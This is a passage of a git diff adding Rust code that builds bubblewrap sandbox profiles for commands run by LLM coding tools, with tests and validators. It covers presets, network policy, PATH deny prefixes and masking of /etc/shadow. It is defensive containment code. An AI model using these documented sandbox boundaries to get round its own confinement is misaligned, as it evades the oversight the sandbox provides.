self.file_overlays, + self.tmp_backing, + entry, + ) + { + return Some(PathMapping::SamePath); + } + None + } +} + +/// Whether `entry` is masked by a tmpfs overlay (and therefore unreadable +/// even when the host rootfs is mounted read-only). +/// +/// Explicit [`tmpfs_overlays`] always win. +/// When `/tmp` itself is backed by tmpfs, any path under `/tmp` (except +/// a bind-mounted host directory) counts as hidden. +/// +/// [`tmpfs_overlays`]: SandboxLayout::tmpfs_overlays +pub(crate) fn path_hidden_by_overlay( + tmpfs_overlays: &[Box], + file_overlays: &[FileOverlay], + tmp_backing: &TmpBacking, + entry: &Path, +) -> bool { + // Explicit overlays (e.g. /home) always shadow the host. + if tmpfs_overlays + .iter() + .any(|overlay| entry.starts_with(overlay)) + { + return true; + } + // File overlays (e.g. /etc/shadow) mask the exact file. + if file_overlays + .iter() + .any(|overlay| *entry == *overlay.dest()) + { + return true; + } + match tmp_backing { + // Pure tmpfs: nothing under /tmp comes from the host. + TmpBacking::Tmpfs => entry.starts_with(Path::new("/tmp")), + // Bind-mounted host dir: that subdir is real, the rest of /tmp is tmpfs. + TmpBacking::BindHost(host_dir) => { + entry.starts_with(Path::new("/tmp")) && !entry.starts_with(host_dir) + } + } +} + +/// Maps a sandbox prefix and relative path into a sandbox path. +pub(crate) fn join_mapped_path<'a>(base: &'a Path, relative: &Path) -> Cow<'a, Path> { + if relative.as_os_str().is_empty() { + Cow::Borrowed(base) + } else { + let mut joined = + PathBuf::with_capacity(base.as_os_str().len() + relative.as_os_str().len() + 1); + joined.push(base); + joined.push(relative); + Cow::Owned(joined) + } +} + +fn map_prefix<'config, 'path>( + entry: &'path Path, + host_prefix: &Path, + dest_prefix: &'config Path, +) -> Option> { + let relative = entry.strip_prefix(host_prefix).ok()?; + if host_prefix == dest_prefix { + Some(PathMapping::SamePath) + } else { + Some(PathMapping::Remap { + dest_prefix, + relative, + }) + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/profile/mod.rs b/src/llm-coding-tools-bubblewrap/src/profile/mod.rs new file mode 100644 index 00000000..0ca7a6bc --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/profile/mod.rs @@ -0,0 +1,19 @@ +//! Bubblewrap profile types, builders, and preset helpers. +//! +//! Public callers should use the short aliases in this module: +//! - [`Builder`] - builds a sandbox profile +//! - [`Profile`] - validated sandbox profile ready for repeated execution +//! - [`Preset`] - preset name stored on the profile +//! - [`TmpBacking`] - how sandbox `/tmp` is mounted + +mod builder; +pub(crate) mod layout; +mod presets; +mod types; +pub(crate) mod validation; + +pub use builder::Builder; +pub use types::{ + Availability, EnvVar, FileMount, FileOverlay, NetworkPolicy, Preset, Profile, Symlink, + TmpBacking, +}; diff --git a/src/llm-coding-tools-bubblewrap/src/profile/presets.rs b/src/llm-coding-tools-bubblewrap/src/profile/presets.rs new file mode 100644 index 00000000..a7df327f --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/profile/presets.rs @@ -0,0 +1,364 @@ +//! Preset helpers for common sandbox setups. +//! +//! Use [`crate::profile::Builder::public_bot`] for untrusted input. +//! Use [`crate::profile::Builder::trusted_maintenance`] for trusted jobs. +//! Both return a [`crate::profile::Builder`], so you can still change settings +//! before calling [`crate::profile::Builder::build`]. + +use super::builder::Builder; +use super::types::{EnvVar, FileOverlay, NetworkPolicy, Preset, Symlink, TmpBacking}; +use crate::path_util::normalize_path; +use std::collections::HashSet; +use std::path::{Path, PathBuf}; +use std::sync::Arc; + +impl Builder { + /// Creates the public-bot preset builder. + /// + /// Good default for untrusted input. + /// + /// - mounts selected system paths, the workspace, and a synthetic home + /// - clears the inherited env and sets a cleaned `PATH` plus `HOME` + /// - disables network + /// - uses `/workspace` and `/home/sandbox` inside the sandbox + /// - does not mount the cache root + /// - uses `Tmpfs` for `/tmp` unless you pass `Some(...)` + /// + /// It hides the real home directory, `/etc`, and other unrelated host + /// paths. + /// + /// # Arguments + /// - `workspace` - Host path to the workspace directory. + /// - `synthetic_home` - Host path to the synthetic home directory. + /// - `cache_root` - Host path to the cache root directory (not mounted by default). + /// - `tmp_backing` - Optional `/tmp` backing. Defaults to `Tmpfs`. + pub fn public_bot( + workspace: impl Into>, + synthetic_home: impl Into>, + cache_root: impl Into>, + tmp_backing: Option, + ) -> Self { + Self::new( + workspace, + synthetic_home, + cache_root, + tmp_backing.unwrap_or(TmpBacking::Tmpfs), + ) + .with_preset(Preset::PublicBot) + .with_workspace_dest(Path::new(WORKSPACE_DEST)) + .with_synthetic_home_dest(Path::new(SYNTHETIC_HOME_DEST)) + .with_mount_cache_root(false) + .with_clear_env(true) + .with_default_env(Arc::from([ + EnvVar::new("PATH", inherited_path(Preset::PublicBot)), + EnvVar::new("HOME", SYNTHETIC_HOME_DEST), + ])) + .with_read_only_mounts(public_bot_read_only_mounts()) + .with_compat_symlinks(public_bot_compat_symlinks()) + } + + /// Creates the trusted-maintenance preset builder. + /// + /// Use this only for trusted jobs. Network stays enabled, so a command can + /// send out any data it can read. + /// + /// - mounts the host root read-only + /// - overlays tmpfs on `/home`; masks `/etc/shadow` with an empty file + /// - uses a synthetic home at `/home/sandbox` + /// - clears the inherited env and sets a cleaned `PATH`, `HOME`, `TMPDIR`, and `XDG_*` + /// - keeps network enabled + /// - bind-mounts the `host_tmp` directory at `/tmp` + /// + /// Writable state stays in the synthetic home, workspace, cache root, and + /// tmpfs overlays. `/etc/shadow` is masked by a read-only bind-mount of an + /// empty regular file so password hashes are not exposed. + /// + /// # Arguments + /// - `workspace` - Host path to the workspace directory. + /// - `synthetic_home` - Host path to the synthetic home directory. + /// - `cache_root` - Host path to the cache root directory. Missing + /// `xdg-cache` and `xdg-state` subdirectories are created during `build()`. + /// - `host_tmp` - Host path to mount at sandbox `/tmp` (must exist). + pub fn trusted_maintenance( + workspace: impl Into>, + synthetic_home: impl Into>, + cache_root: impl Into>, + host_tmp: impl Into>, + ) -> Self { + let cache_root = cache_root.into(); + let tmp_backing = TmpBacking::BindHost(host_tmp.into()); + + Self::new(workspace, synthetic_home, cache_root.clone(), tmp_backing) + .with_preset(Preset::TrustedMaintenance) + .with_synthetic_home_dest(Path::new(SYNTHETIC_HOME_DEST)) + .with_read_only_host_rootfs(true) + .with_tmpfs_overlays(Arc::from([Box::from(Path::new("/home"))])) + .with_file_overlays(Arc::from([FileOverlay::new( + Path::new("/dev/null"), + Path::new("/etc/shadow"), + )])) + .with_clear_env(true) + .with_network_policy(NetworkPolicy::Enabled) + .with_default_env(Arc::from([ + EnvVar::new("PATH", inherited_path(Preset::TrustedMaintenance)), + EnvVar::new("HOME", SYNTHETIC_HOME_DEST), + EnvVar::new("TMPDIR", "/tmp"), + EnvVar::new( + "XDG_CACHE_HOME", + cache_root.join("xdg-cache").to_string_lossy().into_owned(), + ), + EnvVar::new("XDG_CONFIG_HOME", SYNTHETIC_HOME_CONFIG), + EnvVar::new( + "XDG_STATE_HOME", + cache_root.join("xdg-state").to_string_lossy().into_owned(), + ), + ])) + } +} + +const SYNTHETIC_HOME_DEST: &str = "/home/sandbox"; +const SYNTHETIC_HOME_CONFIG: &str = "/home/sandbox/.config"; +const WORKSPACE_DEST: &str = "/workspace"; + +const DEFAULT_SANDBOX_PATH: &str = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/run/current-system/sw/bin:/nix/var/nix/profiles/default/bin"; +const PUBLIC_BOT_PREFIXES: &[&str] = &[ + "/usr/bin", + "/usr/sbin", + "/usr/lib", + "/usr/local/bin", + "/usr/local/sbin", + "/usr/local/lib", + "/bin", + "/sbin", + "/lib", + "/lib64", + "/run/current-system/sw", + "/nix/store", + "/nix/var/nix/profiles/default", +]; +const TRUSTED_DENY_PREFIXES: &[&str] = &[ + "/home", + "/root", + "/tmp", + "/var/tmp", + "/run/user", + "/run/wrappers/bin", + "/etc/profiles/per-user", +]; + +/// Builds a filtered `PATH` string from the host environment for the given [`Preset`]. +/// +/// Each host entry is checked with [`path_entry_allowed`]; entries that fail the +/// check, are empty, or are duplicates are dropped. Falls back to +/// [`DEFAULT_SANDBOX_PATH`] when the host `PATH` is unset or all entries are +/// filtered out. +fn inherited_path(preset: Preset) -> String { + let Some(path) = std::env::var_os("PATH") else { + return DEFAULT_SANDBOX_PATH.to_string(); + }; + + // Preallocate based on upper bound: number of separators + 1 + let path_bytes = path.as_encoded_bytes(); + let capacity = path_bytes.iter().filter(|&&b| b == b':').count() + 1; + let mut entries = Vec::with_capacity(capacity); + let mut seen = HashSet::with_capacity(capacity); + for entry in std::env::split_paths(&path) { + let entry = normalize_path(&entry); + if !path_entry_allowed(preset, &entry) { + continue; + } + let value = entry.to_string_lossy(); + if value.is_empty() { + continue; + } + let value = value.into_owned(); + if !seen.insert(value.clone()) { + continue; + } + entries.push(value); + } + + if entries.is_empty() { + DEFAULT_SANDBOX_PATH.to_string() + } else { + entries.join(":") + } +} + +/// Checks whether a `PATH` entry is safe to include for the given [`Preset`]. +/// +/// The caller must pass an absolute, normalized path. For [`Preset::PublicBot`] +/// only entries under [`PUBLIC_BOT_PREFIXES`] are allowed. For +/// [`Preset::TrustedMaintenance`] everything is allowed except entries under +/// [`TRUSTED_DENY_PREFIXES`]. +fn path_entry_allowed(preset: Preset, entry: &Path) -> bool { + match preset { + Preset::PublicBot => PUBLIC_BOT_PREFIXES + .iter() + .any(|prefix| entry.starts_with(prefix)), + Preset::TrustedMaintenance => { + entry.is_absolute() + && !TRUSTED_DENY_PREFIXES + .iter() + .any(|prefix| entry.starts_with(prefix)) + } + } +} + +/// Collects host directories to mount read-only for [`Preset::PublicBot`]. +/// +/// Checks each prefix in [`PUBLIC_BOT_PREFIXES`] against the host filesystem +/// and includes only those that exist. +fn public_bot_read_only_mounts() -> Arc<[Box]> { + let mut mounts = Vec::with_capacity(PUBLIC_BOT_PREFIXES.len()); + for path in PUBLIC_BOT_PREFIXES { + let path = PathBuf::from(path); + if path.exists() { + mounts.push(path.into_boxed_path()); + } + } + mounts.into() +} + +/// Collects compatibility symlinks for [`Preset::PublicBot`]. +/// +/// On systems without a merged `/usr` layout, `/bin`, `/lib`, and `/sbin` may +/// not exist as symlinks to their `/usr` counterparts. This function checks +/// each candidate and includes only those where the link path is absent and +/// the target directory exists on the host. +fn public_bot_compat_symlinks() -> Arc<[Symlink]> { + let mut symlinks = Vec::with_capacity(3); + for (target, link_path, required_path) in [ + ("usr/bin", "/bin", "/usr/bin"), + ("usr/lib", "/lib", "/usr/lib"), + ("usr/sbin", "/sbin", "/usr/sbin"), + ] { + if !Path::new(link_path).exists() && Path::new(required_path).exists() { + symlinks.push(Symlink::new(target, Path::new(link_path))); + } + } + symlinks.into() +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::profile::NetworkPolicy; + use crate::test_helpers::SandboxFixture; + use serial_test::serial; + use std::env; + + #[test] + #[serial] + fn public_bot_and_trusted_maintenance_differ_on_security_axes() { + let fixture = SandboxFixture::new("exit 0"); + let host_tmp = fixture.make_dir("host-tmp"); + + let public = Builder::public_bot( + fixture.workspace(), + fixture.home(), + fixture.cache(), + Some(TmpBacking::Tmpfs), + ) + .build() + .unwrap(); + + let trusted = Builder::trusted_maintenance( + fixture.workspace(), + fixture.home(), + fixture.cache(), + host_tmp.as_path(), + ) + .build() + .unwrap(); + + assert_eq!(public.preset(), Some(Preset::PublicBot)); + assert_eq!(trusted.preset(), Some(Preset::TrustedMaintenance)); + + assert!(!public.read_only_host_rootfs()); + assert!(trusted.read_only_host_rootfs()); + + assert!(public.tmpfs_overlays().is_empty()); + assert!(!trusted.tmpfs_overlays().is_empty()); + assert!(public.file_overlays().is_empty()); + assert!(!trusted.file_overlays().is_empty()); + + assert_eq!(public.network_policy(), NetworkPolicy::Disabled); + assert_eq!(trusted.network_policy(), NetworkPolicy::Enabled); + + assert!(!public.mount_cache_root()); + assert!(trusted.mount_cache_root()); + + assert!(public.clear_env()); + assert!(trusted.clear_env()); + + assert!(public.credential_file_mounts().is_empty()); + assert!(public.extra_env().is_empty()); + assert!(trusted.credential_file_mounts().is_empty()); + assert!(trusted.extra_env().is_empty()); + } + + #[test] + #[serial] + fn public_bot_path_filters_user_and_temp_entries() { + let fixture = SandboxFixture::new("exit 0"); + unsafe { + env::set_var( + "PATH", + format!( + "/home/alice/.cargo/bin:{}:/tmp/test-bin:/run/current-system/sw/bin:/nix/store/demo/bin", + fixture.temp_path().display() + ), + ) + }; + + let profile = Builder::public_bot( + fixture.workspace(), + fixture.home(), + fixture.cache(), + Some(TmpBacking::Tmpfs), + ) + .build() + .unwrap(); + + let path = profile.default_env()[0].value(); + assert!(path.contains(":")); + assert!(!path.contains("/home/alice/.cargo/bin")); + assert!(!path.contains("/tmp/test-bin")); + } + + #[test] + #[serial] + fn trusted_maintenance_path_filters_hidden_and_volatile_entries() { + let fixture = SandboxFixture::new("exit 0"); + let host_tmp = fixture.make_dir("host-tmp"); + unsafe { + env::set_var( + "PATH", + format!( + "{}:/home/alice/.nix-profile/bin:/run/user/1000/bin:/nix/store/demo/bin:/opt/tool/bin", + fixture.temp_path().display() + ), + ) + }; + + let profile = Builder::trusted_maintenance( + fixture.workspace(), + fixture.home(), + fixture.cache(), + host_tmp.as_path(), + ) + .build() + .unwrap(); + + let path = profile + .default_env() + .iter() + .find(|var| var.name() == "PATH") + .expect("PATH should be present") + .value(); + assert!(path.contains(":")); + assert!(!path.contains("/home/alice/.nix-profile/bin")); + assert!(!path.contains("/run/user/1000/bin")); + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/profile/types.rs b/src/llm-coding-tools-bubblewrap/src/profile/types.rs new file mode 100644 index 00000000..9223ad34 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/profile/types.rs @@ -0,0 +1,544 @@ +//! Types for bubblewrap profiles and related settings. +//! +//! Main types: +//! - [`crate::profile::Profile`] - validated sandbox profile +//! - [`crate::profile::Preset`] - preset name stored on the profile +//! - [`crate::profile::TmpBacking`] - how sandbox `/tmp` is mounted +//! - [`crate::profile::Availability`] - whether `bwrap` can run + +use super::layout::{join_mapped_path, PathMapping, SandboxLayout}; +use crate::LinuxBwrapError; +use std::borrow::Cow; +use std::ffi::OsString; +use std::path::Path; +use std::sync::Arc; + +/// Preset names for common sandbox setups. +/// +/// [`Self::TrustedMaintenance`] is only for trusted jobs. It keeps network +/// access enabled, so a command can send out any data it can read. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum Preset { + /// Safer defaults for untrusted or public input. + /// + /// This preset mounts selected system paths, the workspace, the synthetic + /// home, `/dev`, `/proc`, and `/tmp`. It does not expose the real home + /// directory or inherited env vars. + PublicBot, + /// Broader defaults for trusted jobs. + /// + /// This preset keeps network access enabled and exposes the host root + /// read-only. Do not use it for untrusted input. + TrustedMaintenance, +} + +/// Network policy for Linux sandbox execution. +#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)] +pub enum NetworkPolicy { + /// Network access is disabled (default). + #[default] + Disabled, + /// Network access is enabled. + Enabled, +} + +/// How sandbox `/tmp` is mounted. +/// +/// Use [`Self::Tmpfs`] to keep `/tmp` in memory. Use [`Self::BindHost`] to +/// mount a host directory at `/tmp`. +#[derive(Debug, Clone, PartialEq, Eq, Default)] +pub enum TmpBacking { + /// Mount `/tmp` as tmpfs inside the sandbox. + #[default] + Tmpfs, + /// Mount a host directory at sandbox `/tmp`. + /// + /// You create and clean up the directory. + BindHost(Box), +} + +/// Whether bubblewrap can run. +/// +/// Stores the check result and, when unavailable, the reason. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum Availability { + /// Availability has not been checked yet. + Unknown, + /// Bubblewrap is available. + Available, + /// Bubblewrap cannot run. + Unavailable { + /// Why bubblewrap is unavailable. + reason: Box, + }, +} + +impl Availability { + /// Checks whether bubblewrap can run in the current process. + /// + /// # Returns + /// - [`Availability::Available`] when `bwrap` is present and usable. + /// - [`Availability::Unavailable`] with an actionable reason otherwise. + pub fn detect() -> Self { + crate::probe::probe_availability() + } + + /// Creates an unavailable state with a reason. + /// + /// # Examples + /// ``` + /// use llm_coding_tools_bubblewrap::profile::Availability; + /// + /// let avail = Availability::unavailable("bwrap not found"); + /// assert!(!avail.is_available()); + /// ``` + pub fn unavailable(reason: impl Into>) -> Self { + Self::Unavailable { + reason: reason.into(), + } + } + + /// Returns the reason when bubblewrap is unavailable. + /// + /// Returns `None` for `Unknown` and `Available`. + pub fn reason(&self) -> Option<&str> { + match self { + Self::Unavailable { reason } => Some(reason.as_ref()), + Self::Unknown | Self::Available => None, + } + } + + /// Returns whether bubblewrap is known to be available. + pub fn is_available(&self) -> bool { + matches!(self, Self::Available) + } +} + +/// One environment variable for the sandbox. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct EnvVar { + name: Box, + value: Box, +} + +impl EnvVar { + /// Creates an environment variable. + /// + /// # Arguments + /// - `name` - The variable name, such as `PATH` or `HOME`. + /// - `value` - The variable value. + pub fn new(name: impl Into>, value: impl Into>) -> Self { + Self { + name: name.into(), + value: value.into(), + } + } + + /// Returns the variable name. + pub fn name(&self) -> &str { + &self.name + } + + /// Returns the variable value. + pub fn value(&self) -> &str { + &self.value + } +} + +/// One symlink to create inside the sandbox root. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct Symlink { + target: Box, + link_path: Box, +} + +impl Symlink { + /// Creates a symlink entry. + /// + /// # Arguments + /// - `target` - The symlink target path. + /// - `link_path` - The path where the symlink is created inside the sandbox. + pub fn new(target: impl Into>, link_path: impl Into>) -> Self { + Self { + target: target.into(), + link_path: link_path.into(), + } + } + + /// Returns the symlink target. + pub fn target(&self) -> &str { + &self.target + } + + /// Returns the link path inside the sandbox. + pub fn link_path(&self) -> &Path { + &self.link_path + } +} + +/// One read-only file mount inside the sandbox. +/// +/// # Validation +/// - The source must be an absolute regular file on the host. +/// - The destination must stay under the mounted synthetic home, workspace, or cache root. +/// - Directory mounts, sockets, and agent forwarding are not allowed. +/// +/// Make sure the destination parent directory exists before launch. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct FileMount { + source: Box, + dest: Box, +} + +impl FileMount { + /// Creates a file mount. + /// + /// # Arguments + /// - `source` - The source file path on the host. + /// - `dest` - The destination path inside the sandbox. + pub fn new(source: impl Into>, dest: impl Into>) -> Self { + Self { + source: source.into(), + dest: dest.into(), + } + } + + /// Returns the source file path on the host. + pub fn source(&self) -> &Path { + &self.source + } + + /// Returns the destination path inside the sandbox. + pub fn dest(&self) -> &Path { + &self.dest + } +} + +/// One read-only file overlay inside the sandbox. +/// +/// Replaces a file anywhere in the sandbox rootfs with content from a host +/// file via a read-only bind-mount. Unlike [`FileMount`], the destination is +/// not restricted to mounted prefixes - it can target any absolute path such +/// as `/etc/shadow` or `/etc/hostname`. +/// +/// # Validation +/// - The source must be an absolute path that exists on the host. +/// - The destination must be an absolute path. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct FileOverlay { + source: Box, + dest: Box, +} + +impl FileOverlay { + /// Creates a file overlay. + /// + /// # Arguments + /// - `source` - The host file whose content is bind-mounted read-only. + /// - `dest` - The sandbox path to be replaced. + pub fn new(source: impl Into>, dest: impl Into>) -> Self { + Self { + source: source.into(), + dest: dest.into(), + } + } + + /// Returns the host source file path. + pub fn source(&self) -> &Path { + &self.source + } + + /// Returns the sandbox destination path. + pub fn dest(&self) -> &Path { + &self.dest + } +} + +/// A validated bubblewrap profile ready for repeated command wrapping. +/// +/// Build this with [`crate::profile::Builder::build`](crate::profile::Builder::build). +/// +/// The build step validates profile-owned paths, resolves the `bwrap` binary, +/// picks a visible host shell, and precomputes the static `bwrap` argv prefix. +/// [`crate::wrap::wrap_command`] only needs to map the per-call working +/// directory and append the shell command tail. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct Profile { + pub(crate) preset: Option, + pub(crate) workspace: Box, + pub(crate) workspace_dest: Box, + pub(crate) synthetic_home: Box, + pub(crate) synthetic_home_dest: Box, + pub(crate) cache_root: Box, + pub(crate) tmp_backing: TmpBacking, + pub(crate) mount_cache_root: bool, + pub(crate) compat_symlinks: Arc<[Symlink]>, + pub(crate) read_only_mounts: Arc<[Box]>, + pub(crate) read_write_mounts: Arc<[Box]>, + pub(crate) tmpfs_overlays: Arc<[Box]>, + pub(crate) file_overlays: Arc<[FileOverlay]>, + pub(crate) credential_file_mounts: Arc<[FileMount]>, + pub(crate) read_only_host_rootfs: bool, + pub(crate) network_policy: NetworkPolicy, + pub(crate) clear_env: bool, + pub(crate) default_env: Arc<[EnvVar]>, + pub(crate) extra_env: Arc<[EnvVar]>, + pub(crate) availability: Availability, + pub(crate) bwrap_program: Arc, + pub(crate) shell: Box, + pub(crate) static_args: Arc<[OsString]>, +} + +impl Profile { + /// Builds the public-bot defaults in one call. + #[cfg(test)] + pub(crate) fn public_bot_defaults( + workspace: impl Into>, + synthetic_home: impl Into>, + cache_root: impl Into>, + tmp_backing: Option, + ) -> Result { + use super::Builder; + Builder::public_bot(workspace, synthetic_home, cache_root, tmp_backing).build() + } + + /// Builds the trusted-maintenance defaults in one call. + #[cfg(test)] + pub(crate) fn trusted_maintenance_defaults( + workspace: impl Into>, + synthetic_home: impl Into>, + cache_root: impl Into>, + host_tmp: impl Into>, + ) -> Result { + use super::Builder; + Builder::trusted_maintenance(workspace, synthetic_home, cache_root, host_tmp).build() + } + + /// Returns the preset used to create this profile, if any. + /// + /// Returns `None` if the profile was built without a preset. + pub fn preset(&self) -> Option { + self.preset + } + + /// Returns the host workspace path. + pub fn workspace(&self) -> &Path { + &self.workspace + } + + /// Returns the workspace path inside the sandbox. + pub fn workspace_dest(&self) -> &Path { + &self.workspace_dest + } + + /// Returns the host synthetic home path. + pub fn synthetic_home(&self) -> &Path { + &self.synthetic_home + } + + /// Returns the synthetic home path inside the sandbox. + pub fn synthetic_home_dest(&self) -> &Path { + &self.synthetic_home_dest + } + + /// Returns the host cache root path. + pub fn cache_root(&self) -> &Path { + &self.cache_root + } + + /// Returns the backing strategy for sandbox `/tmp`. + pub fn tmp_backing(&self) -> &TmpBacking { + &self.tmp_backing + } + + /// Returns whether to mount the cache root. + pub fn mount_cache_root(&self) -> bool { + self.mount_cache_root + } + + /// Returns the compatibility symlinks as a slice. + pub fn compat_symlinks(&self) -> &[Symlink] { + &self.compat_symlinks + } + + /// Returns the read-only mounts as a slice. + pub fn read_only_mounts(&self) -> &[Box] { + &self.read_only_mounts + } + + /// Returns the read-write mounts as a slice. + pub fn read_write_mounts(&self) -> &[Box] { + &self.read_write_mounts + } + + /// Returns the tmpfs overlay paths as a slice. + pub fn tmpfs_overlays(&self) -> &[Box] { + &self.tmpfs_overlays + } + + /// Returns the file overlays as a slice. + /// + /// Each overlay replaces a sandbox file with a read-only bind-mount of a + /// host file, effectively masking the original content. + pub fn file_overlays(&self) -> &[FileOverlay] { + &self.file_overlays + } + + /// Returns the credential file mounts as a slice. + /// + /// Make sure destination parent directories exist before launch. + pub fn credential_file_mounts(&self) -> &[FileMount] { + &self.credential_file_mounts + } + + /// Returns whether the host root is mounted read-only. + pub fn read_only_host_rootfs(&self) -> bool { + self.read_only_host_rootfs + } + + /// Returns the network policy. + pub fn network_policy(&self) -> NetworkPolicy { + self.network_policy + } + + /// Returns whether inherited env vars are cleared. + pub fn clear_env(&self) -> bool { + self.clear_env + } + + /// Returns the default environment variables as a slice. + pub fn default_env(&self) -> &[EnvVar] { + &self.default_env + } + + /// Returns the extra environment variables as a slice. + pub fn extra_env(&self) -> &[EnvVar] { + &self.extra_env + } + + /// Returns the availability state. + pub fn availability(&self) -> &Availability { + &self.availability + } + + pub(crate) fn bwrap_program(&self) -> &Path { + self.bwrap_program.as_ref() + } + + pub(crate) fn shell(&self) -> &Path { + &self.shell + } + + pub(crate) fn static_args(&self) -> &[OsString] { + &self.static_args + } + + /// Translates a host working directory to the corresponding path inside the + /// sandbox. + /// + /// Returns [`Cow::Borrowed`] when the path is returned unchanged; + /// [`Cow::Owned`] only when a bind-mount prefix had to be rewritten. + /// + /// # Errors + /// + /// Returns [`LinuxBwrapError::InvalidPath`] when `workdir` is a host path + /// that the sandbox does not expose (not under any mounted prefix). + #[inline] + pub(crate) fn map_workdir_to_sandbox<'a>( + &'a self, + workdir: Option<&'a Path>, + ) -> Result, LinuxBwrapError> { + let Some(dir) = workdir else { + return Ok(Cow::Borrowed(self.workspace_dest())); + }; + + if let Some(mapping) = self.sandbox_layout().classify(dir) { + return Ok(match mapping { + PathMapping::SamePath => Cow::Borrowed(dir), + PathMapping::Remap { + dest_prefix, + relative, + } => join_mapped_path(dest_prefix, relative), + }); + } + + Err(LinuxBwrapError::InvalidPath(format!( + "working directory is not visible inside the linux sandbox: {}", + dir.display() + ))) + } + + fn sandbox_layout(&self) -> SandboxLayout<'_> { + SandboxLayout { + workspace: self.workspace(), + workspace_dest: self.workspace_dest(), + synthetic_home: self.synthetic_home(), + synthetic_home_dest: self.synthetic_home_dest(), + cache_root: self.cache_root(), + mount_cache_root: self.mount_cache_root(), + tmp_backing: self.tmp_backing(), + read_only_host_rootfs: self.read_only_host_rootfs(), + tmpfs_overlays: self.tmpfs_overlays(), + file_overlays: self.file_overlays(), + read_only_mounts: self.read_only_mounts(), + read_write_mounts: self.read_write_mounts(), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use std::borrow::Cow; + use std::ffi::OsString; + + fn profile_with_workspace_dest(workspace_dest: &str) -> Profile { + Profile { + preset: None, + workspace: Box::from(Path::new("/host/workspace")), + workspace_dest: Box::from(Path::new(workspace_dest)), + synthetic_home: Box::from(Path::new("/host/home")), + synthetic_home_dest: Box::from(Path::new("/sandbox/home")), + cache_root: Box::from(Path::new("/cache")), + tmp_backing: TmpBacking::Tmpfs, + mount_cache_root: true, + compat_symlinks: Arc::new([]), + read_only_mounts: Arc::new([]), + read_write_mounts: Arc::new([]), + tmpfs_overlays: Arc::new([]), + file_overlays: Arc::new([]), + credential_file_mounts: Arc::new([]), + read_only_host_rootfs: false, + network_policy: NetworkPolicy::Disabled, + clear_env: false, + default_env: Arc::new([]), + extra_env: Arc::new([]), + availability: Availability::Unknown, + bwrap_program: Arc::from(Box::from(Path::new("/usr/bin/bwrap"))), + shell: Box::from(Path::new("/bin/sh")), + static_args: Arc::<[OsString]>::from([]), + } + } + + #[test] + fn map_workdir_to_sandbox_borrows_when_path_is_unchanged() { + let dir = Path::new("/host/workspace/subdir"); + let profile = profile_with_workspace_dest("/host/workspace"); + + match profile.map_workdir_to_sandbox(Some(dir)).unwrap() { + Cow::Borrowed(mapped) => assert_eq!(mapped, dir), + Cow::Owned(mapped) => panic!("expected borrowed path, got {}", mapped.display()), + } + } + + #[test] + fn map_workdir_to_sandbox_allocates_only_for_rewritten_prefixes() { + let dir = Path::new("/host/workspace/subdir"); + let profile = profile_with_workspace_dest("/workspace"); + + match profile.map_workdir_to_sandbox(Some(dir)).unwrap() { + Cow::Borrowed(mapped) => panic!("expected owned path, got {}", mapped.display()), + Cow::Owned(mapped) => assert_eq!(mapped, Path::new("/workspace/subdir")), + } + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/profile/validation.rs b/src/llm-coding-tools-bubblewrap/src/profile/validation.rs new file mode 100644 index 00000000..eb51d265 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/profile/validation.rs @@ -0,0 +1,217 @@ +//! Shared validation helpers for bubblewrap profiles. +//! +//! Path, symlink, environment variable, and backing-store checks used +//! during profile construction. +//! +//! # Validation +//! +//! Every validator returns [`Result<(), LinuxBwrapError>`] with +//! [`LinuxBwrapError::InvalidPath`] on failure. Validators are designed +//! to be called early and fail fast before a profile is assembled. +//! +//! # Public API +//! +//! - **Directory & path checks**: [`validate_absolute_path`], +//! [`validate_directory_path`], [`validate_optional_directory_path`], +//! [`validate_existing_path`], [`validate_mount_paths`] +//! - **Overlay checks**: [`validate_tmpfs_overlays`], [`validate_file_overlays`] +//! - **Symlink checks**: [`validate_symlinks`] +//! - **Environment variable checks**: [`validate_env_vars`] +//! - **Tmp backing checks**: [`validate_tmp_backing`] +//! - **Cache setup**: [`ensure_cache_root_subdirs`] + +use super::types::{EnvVar, FileOverlay, Symlink, TmpBacking}; +use crate::LinuxBwrapError; +use std::fs; +use std::path::Path; + +/// Creates `xdg-cache` and `xdg-state` subdirectories under `cache_root`. +/// +/// No-op when `mount_cache_root` is false. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError::InvalidPath`] if `cache_root` is not absolute +/// or a subdirectory cannot be created. +pub(crate) fn ensure_cache_root_subdirs( + mount_cache_root: bool, + cache_root: &Path, +) -> Result<(), LinuxBwrapError> { + if !mount_cache_root { + return Ok(()); + } + + validate_absolute_path(cache_root, "cache root host path")?; + for subdir in ["xdg-cache", "xdg-state"] { + let path = cache_root.join(subdir); + fs::create_dir_all(&path).map_err(|err| { + LinuxBwrapError::InvalidPath(format!( + "failed to create cache root subdir {}: {err}", + path.display() + )) + })?; + } + Ok(()) +} + +/// Validates that `path` is absolute. +pub(crate) fn validate_absolute_path(path: &Path, label: &str) -> Result<(), LinuxBwrapError> { + if path.is_absolute() { + Ok(()) + } else { + Err(LinuxBwrapError::InvalidPath(format!( + "{label} must be an absolute path: {}", + path.display() + ))) + } +} + +/// Validates that an optional directory path is absolute, exists, and is a directory. +pub(crate) fn validate_optional_directory_path( + path: Option<&Path>, + label: &str, +) -> Result<(), LinuxBwrapError> { + match path { + Some(path) => validate_directory_path(path, label), + None => Ok(()), + } +} + +/// Validates that `path` is an absolute existing directory. +pub(crate) fn validate_directory_path(path: &Path, label: &str) -> Result<(), LinuxBwrapError> { + validate_absolute_path(path, label)?; + let metadata = fs::metadata(path).map_err(|_| { + LinuxBwrapError::InvalidPath(format!("{label} does not exist: {}", path.display())) + })?; + if 